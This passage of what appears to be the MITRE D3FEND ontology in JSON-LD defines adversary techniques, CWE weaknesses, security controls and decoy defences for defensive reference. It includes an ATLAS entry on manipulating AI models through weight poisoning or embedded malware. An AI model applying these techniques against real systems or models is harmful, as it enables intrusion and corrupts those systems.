      "d3f:definition": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.",
      "rdfs:label": "Boot or Logon Initialization Scripts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-193",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-193",
      "d3f:definition": "A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value.",
      "d3f:synonym": "off-by-five",
      "rdfs:label": "Off-by-one Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:may-be-deceived-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be deceived by",
      "owl:inverseOf": {
        "@id": "d3f:may-deceive"
      },
      "rdfs:label": "may-be-deceived-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:Reference-MockAttackCybersecurityTrainingSystemAndMethods_WOMBATSECURITYTECHNOLOGIESInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9558677B2/"
      },
      "d3f:kb-abstract": "A training system senses a user action that may expose the user to a threat, such as a cybersecurity threat. The user action may be in response to a mock attack delivered via a messaging service, a wireless communication service, a fake malware application or another device, service, system or mechanism. The system selects a training action from a collection of available training actions and causes the training action to be delivered to the user.",
      "d3f:kb-author": "Norman Sadeh-Koniecpol, Kurt Wescoe, Jason Brubaker, Jason Hong",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "WOMBAT SECURITY TECHNOLOGIES Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyPublicRelease"
      },
      "d3f:kb-reference-title": "Mock attack cybersecurity training system and methods",
      "rdfs:label": "Reference - Mock attack cybersecurity training system and methods - WOMBAT SECURITY TECHNOLOGIES Inc"
    },
    {
      "@id": "d3f:CCI-000219_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, decomposes information into organization-defined policy-relevant subcomponents for submission to policy enforcement mechanisms.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000219"
    },
    {
      "@id": "d3f:T1598",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598",
      "d3f:definition": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.",
      "rdfs:label": "Phishing for Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:T1568.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1568.002",
      "d3f:definition": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)",
      "rdfs:label": "Domain Generation Algorithms",
      "rdfs:subClassOf": {
        "@id": "d3f:T1568"
      }
    },
    {
      "@id": "d3f:T0822",
      "@type": "owl:Class",
      "d3f:attack-id": "T0822",
      "d3f:definition": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)",
      "rdfs:label": "External Remote Services - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "External Remote Services"
    },
    {
      "@id": "d3f:AML.T0018",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018",
      "d3f:definition": "Adversaries may directly manipulate an AI model to change its behavior or introduce malicious code. Manipulating a model gives the adversary a persistent change in the system. This can include poisoning the model by changing its weights, modifying the model architecture to change its behavior, and embedding malware which may be executed when the model is loaded.",
      "rdfs:label": "Manipulate AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASAIAttackStagingTechnique"
        },
        {
          "@id": "d3f:ATLASPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Manipulate AI Model"
    },
    {
      "@id": "d3f:LaptopComputer",
      "@type": "owl:Class",
      "d3f:definition": "A laptop computer (also laptop), is a small, portable personal computer (PC) with a \"clamshell\" form factor, typically having a thin LCD or LED computer screen mounted on the inside of the upper lid of the clamshell and an alphanumeric keyboard on the inside of the lower lid. The clamshell is opened up to use the computer. Laptops are folded shut for transportation, and thus are suitable for mobile use. Its name comes from lap, as it was deemed to be placed on a person's lap when being used. Although originally there was a distinction between laptops and notebooks (the former being bigger and heavier than the latter), as of 2014, there is often no longer any difference. Today, laptops are commonly used in a variety of settings, such as at work, in education, for playing games, web browsing",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Laptop"
      },
      "rdfs:label": "Laptop Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": [
        "Laptop",
        "Notebook"
      ]
    },
    {
      "@id": "d3f:DecoyUserCredential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyUserCredential"
      ],
      "d3f:d3fend-id": "D3-DUC",
      "d3f:definition": "A Credential created for the purpose of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nA detection analytic is developed to determine when a user uses decoy credentials. Subsequent actions by that user may be monitored or controlled by the defender.\n\nA credential may be:\n * Domain username and password\n * Local system username and password\n\n## Considerations\n* Decoy credentials should be integrated with a larger decoy environment to ensure that when decoy credentials are compromised, the credentials are used to interact with a decoy asset that is being monitored.\n* Continuous maintenance and updates are needed to ensure the legitimacy of the larger decoy environment and specifically the assets that utilize the decoy credentials.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_CymmetriaInc"
        },
        {
          "@id": "d3f:Reference-DecoyNetwork-BasedServiceForDeceivingAttackers-AmazonTechnologies"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForIdentifyingThePresenceOfMalwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc"
        }
      ],
      "d3f:spoofs": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Decoy User Credential",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:N0183edc93d76494d90b0df913aac9179"
        }
      ]
    },
    {
      "@id": "_:N0183edc93d76494d90b0df913aac9179",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:RegressionAnalysisLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RAL",
      "d3f:definition": "Regression is used to understand the relationship between dependent and independent variables which is then used to make projections, such as for sales revenue for a given business.",
      "d3f:kb-article": "## References\nSupervised Learning. IBM. [Link](https://www.ibm.com/topics/supervised-learning).",
      "rdfs:label": "Regression Analysis Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:SupervisedLearning"
      }
    },
    {
      "@id": "d3f:CCI-002464_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides data integrity protection artifacts for internal name/address resolution queries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002464"
    },
    {
      "@id": "d3f:T1056.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:GraphicalUserInterface"
      },
      "d3f:attack-id": "T1056.002",
      "d3f:definition": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).",
      "rdfs:label": "GUI Input Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N4a3ec488584b4347b7b2c04475a6f6f9"
        }
      ]
    },
    {
      "@id": "_:N4a3ec488584b4347b7b2c04475a6f6f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GraphicalUserInterface"
      }
    },
    {
      "@id": "d3f:CWE-777",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-777",
      "d3f:definition": "The product uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through.",
      "rdfs:label": "Regular Expression without Anchors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-625"
      }
    },
    {
      "@id": "d3f:T1592",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592",
      "d3f:definition": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).",
      "rdfs:label": "Gather Victim Host Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:RemoteProcedureCall",
      "@type": "owl:Class",
      "d3f:definition": "In distributed computing a remote procedure call (RPC) is when a computer program causes a procedure (subroutine) to execute in another address space (commonly on another computer on a shared network), which is coded as if it were a normal (local) procedure call, without the programmer explicitly coding the details for the remote interaction. That is, the programmer writes essentially the same code whether the subroutine is local to the executing program, or remote. This is a form of client-server interaction (caller is client, executor is server), typically implemented via a request-response message-passing system. The object-oriented programming analog is remote method invocation (RMI). The RPC model implies a level of location transparency.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Remote_procedure_call"
      },
      "rdfs:label": "Remote Procedure Call",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/dce_rpc"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:T1590.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.005",
      "d3f:definition": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and/or where/how their publicly-facing infrastructure is hosted.",
      "rdfs:label": "IP Addresses",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:OSAPIResumeProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that resumes the execution of a paused, stopped, or suspended process.",
      "d3f:invokes": {
        "@id": "d3f:ResumeProcess"
      },
      "rdfs:label": "OS API Resume Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N60be2b1720d54354aefa52543cfcdb8d"
        }
      ]
    },
    {
      "@id": "_:N60be2b1720d54354aefa52543cfcdb8d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResumeProcess"
      }
    },
    {
      "@id": "d3f:CWE-1085",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1085",
      "d3f:definition": "A function, method, procedure, etc. contains an excessive amount of code that has been commented out within its body.",
      "rdfs:label": "Invokable Control Element with Excessive Volume of Commented-out Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:HeterogeneousAsymmetricFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HAFBTL",
      "d3f:definition": "Asymmetric transformation mapping transforms the source feature space to align with that of the target or the target to that of the source. This, in effect, bridges the feature space gap and reduces the problem into a homogeneous transfer problem when further distribution differences need to be corrected.",
      "d3f:kb-article": "## References\nWang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Heterogeneous Asymmetric Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HeterogeneousTransferLearning"
      }
    },
    {
      "@id": "d3f:OutboundInternetDNSLookupTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet DNS lookup traffic is network traffic using the DNS protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "d3f:may-contain": {
        "@id": "d3f:DNSLookup"
      },
      "rdfs:label": "Outbound Internet DNS Lookup Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        },
        {
          "@id": "_:Nf00ef79ebb4047008671b3adfb4cf4e7"
        }
      ]
    },
    {
      "@id": "_:Nf00ef79ebb4047008671b3adfb4cf4e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:T1027.015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.015",
      "d3f:definition": "Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)",
      "rdfs:label": "Compression",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:IPCNetworkTraffic",
      "@type": "owl:Class",
      "d3f:definition": "IPC network traffic is network traffic related to inter-process communication (IPC) between network nodes. This includes only network traffic conforming to a standard IPC protocol, not custom protocols.",
      "rdfs:label": "IPC Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:ANN-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ABC",
      "d3f:definition": "Combines the principles of Artificial Neural Networks (ANN) and clustering methods.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Artificial neural network. [Link](https://en.wikipedia.org/wiki/Artificial_neural_network)",
      "rdfs:label": "ANN-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:RDPInitialRequestEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP client initiates communication with a server by sending a request to establish a session and negotiate protocol capabilities for remote interaction.",
      "rdfs:label": "RDP Initial Request Event",
      "rdfs:subClassOf": {
        "@id": "d3f:RDPEvent"
      }
    },
    {
      "@id": "d3f:CWE-1311",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1311",
      "d3f:definition": "The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another.",
      "rdfs:label": "Improper Translation of Security Attributes by Fabric Bridge",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-002283_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the integrity of organization-defined security attributes associated with organization-defined subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002283"
    },
    {
      "@id": "d3f:CCI-002009_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system accepts Personal Identity Verification (PIV) credentials from other federal agencies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002009"
    },
    {
      "@id": "d3f:DS0012",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A file or stream containing a list of commands, allowing them to be launched in sequence",
      "rdfs:comment": "This data source captures events relating to scripts and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Script (ATT&CK DS)"
    },
    {
      "@id": "d3f:LinuxPauseProcess",
      "@type": "owl:Class",
      "d3f:definition": "Causes the calling process to sleep until a signal is delivered that either terminates the process or causes the invocation of a signal-catching function.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/pause.2.html"
      },
      "rdfs:label": "Linux Pause Process",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendProcess"
      }
    },
    {
      "@id": "d3f:T1587",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587",
      "d3f:definition": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)",
      "rdfs:label": "Develop Capabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:T0868",
      "@type": "owl:Class",
      "d3f:attack-id": "T0868",
      "d3f:definition": "Adversaries may gather information about a PLC's or controller's current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:",
      "rdfs:label": "Detect Operating Mode - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Detect Operating Mode"
    },
    {
      "@id": "d3f:EXF-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.02",
      "d3f:definition": "Switching activity in chips, buses, and clocks radiates EM energy that can be captured and analyzed to reveal internal computation. Near-field probes (in test) or proximity receivers (on-orbit assets) can observe harmonics and modulation tied to cipher rounds, key schedules, or protocol framing, sometimes with finer granularity than power analysis. Coupling paths include packages, harnesses, SDR front ends, and poorly shielded enclosures. By training on known operations and comparing spectra or time-domain signatures, an adversary can recover keys or reconstruct processed data without touching logical interfaces.",
      "rdfs:label": "Electromagnetic Leakage Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Electromagnetic Leakage Attacks"
    },
    {
      "@id": "d3f:DS0026",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)",
      "rdfs:comment": "This data source captures events relating to Active Directory objects and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Active Directory (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-326",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-326",
      "d3f:definition": "The product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.",
      "rdfs:label": "Inadequate Encryption Strength",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-578",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-578",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using the class loader.",
      "rdfs:label": "EJB Bad Practices: Use of Class Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:EX-0014.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014.03",
      "d3f:definition": "The attacker presents fabricated or biased measurements that estimation and control treat as ground truth. Targets include attitude/position sensors (star trackers, gyros/IMUs, sun sensors, magnetometers, GNSS), environmental and health sensors (temperatures, currents, voltages, pressures), and payload measurements used in autonomy. Spoofs may be injected electrically at interfaces, optically (blinding/dazzling trackers or sun sensors), magnetically, or by crafting packets fed into sensor gateways. Even small, consistent biases can drive filters to incorrect states; stepwise changes can trigger fault responses or mode switches. Downstream, timestamps, quality flags, and derived products inherit the deception, creating uncertainty for operators and potentially inducing temporary loss of service as autonomy reacts to a world that never existed.",
      "rdfs:label": "Sensor Data - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0014"
      },
      "skos:prefLabel": "Sensor Data"
    },
    {
      "@id": "d3f:T1027.016",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.016",
      "d3f:definition": "Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)",
      "rdfs:label": "Junk Code Insertion",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:OSAPIDeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that removes a file from the file system.",
      "d3f:invokes": {
        "@id": "d3f:DeleteFile"
      },
      "rdfs:label": "OS API Delete File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Ncde6c8d43e5a45b5b6bfed4852f513a9"
        }
      ]
    },
    {
      "@id": "_:Ncde6c8d43e5a45b5b6bfed4852f513a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DeleteFile"
      }
    },
    {
      "@id": "d3f:CWE-939",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-939",
      "d3f:definition": "The product uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme.",
      "rdfs:label": "Improper Authorization in Handler for Custom URL Scheme",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-862"
      }
    },
    {
      "@id": "d3f:Reference-Deception-BasedResponsesToSecurityAttacks_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20140250524A1/en?oq=US-2014250524-A1"
      },
      "d3f:kb-abstract": "Deception-based techniques for responding to security attacks are described herein. The techniques include transitioning a security attack to a monitored computing device posing as a computing device impacted by the security attack and enabling the adversary to obtain deceptive information from the monitored computing device. Also, the adversary may obtain a document configured to report identifying information of an entity opening the document, thereby identifying the adversary associated with the attack. Further, the techniques include determining that a domain specified in a domain name request is associated with malicious activity and responding to the request with a network address of a monitored computing device to cause the requesting process to communicate with the monitored computing device in place of an adversary server. Additionally, a service may monitor dormant domains names associated with malicious activity and, in response to a change, respond with an alert or a configuration update.",
      "d3f:kb-author": "Adam S. Meyers; Dmitri Alperovitch; George Robert Kurtz; David F. Diehl; Sven Krasser",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyNetworkResource"
      },
      "d3f:kb-reference-title": "Deception-Based Responses to Security Attacks",
      "rdfs:label": "Reference - Deception-Based Responses to Security Attacks - Crowdstrike Inc"
    },
    {
      "@id": "d3f:OSAPICopyToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a duplicate or copy of an existing security token.",
      "d3f:invokes": {
        "@id": "d3f:CopyToken"
      },
      "rdfs:label": "OS API Copy Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N8bc27d2a8cdd4ea3b1dcf0040003ba53"
        }
      ]
    },
    {
      "@id": "_:N8bc27d2a8cdd4ea3b1dcf0040003ba53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CopyToken"
      }
    },
    {
      "@id": "d3f:CWE-837",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-837",
      "d3f:definition": "The product requires that an actor should only be able to perform an action once, or to have only one unique action, but the product does not enforce or improperly enforces this restriction.",
      "rdfs:label": "Improper Enforcement of a Single, Unique Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-799"
      }
    },
    {
      "@id": "d3f:UtilitySoftware",
      "@type": "owl:Class",
      "d3f:definition": "Utility applications are software applications designed to help analyze, configure, optimize or maintain a computer. They are used to support the computer infrastructure - in contrast to application software, which is aimed at directly performing tasks that benefit ordinary users. However, utilities often form part of the application systems. For example, a batch job may run user-written code to update a database and may then include a step that runs a utility to back up the database, or a job may run a utility to compress a disk before copying files.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Utility_software"
      },
      "rdfs:label": "Utility Software",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      },
      "skos:altLabel": "Utility Application"
    },
    {
      "@id": "d3f:CWE-1090",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1090",
      "d3f:definition": "A method for a class performs an operation that directly accesses a member element from another class.",
      "rdfs:label": "Method Containing Access of a Member Element from Another Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:CWE-565",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-565",
      "d3f:definition": "The product relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user.",
      "rdfs:label": "Reliance on Cookies without Validation and Integrity Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-602"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:NTFSHardLink",
      "@type": "owl:Class",
      "d3f:definition": "An NTFS hard link points to another file in the same filesystem, and the files share the same MFT entry (inode).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:NTFS_links"
      },
      "rdfs:label": "NTFS Hard Link",
      "rdfs:seeAlso": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardLink"
        },
        {
          "@id": "d3f:NTFSLink"
        }
      ]
    },
    {
      "@id": "d3f:M1045",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ServiceBinaryVerification"
        }
      ],
      "rdfs:label": "Code Signing"
    },
    {
      "@id": "d3f:CWE-1394",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1394",
      "d3f:definition": "The product uses a default cryptographic key for potentially critical functionality.",
      "rdfs:label": "Use of Default Cryptographic Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1392"
      }
    },
    {
      "@id": "d3f:SystemInitScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
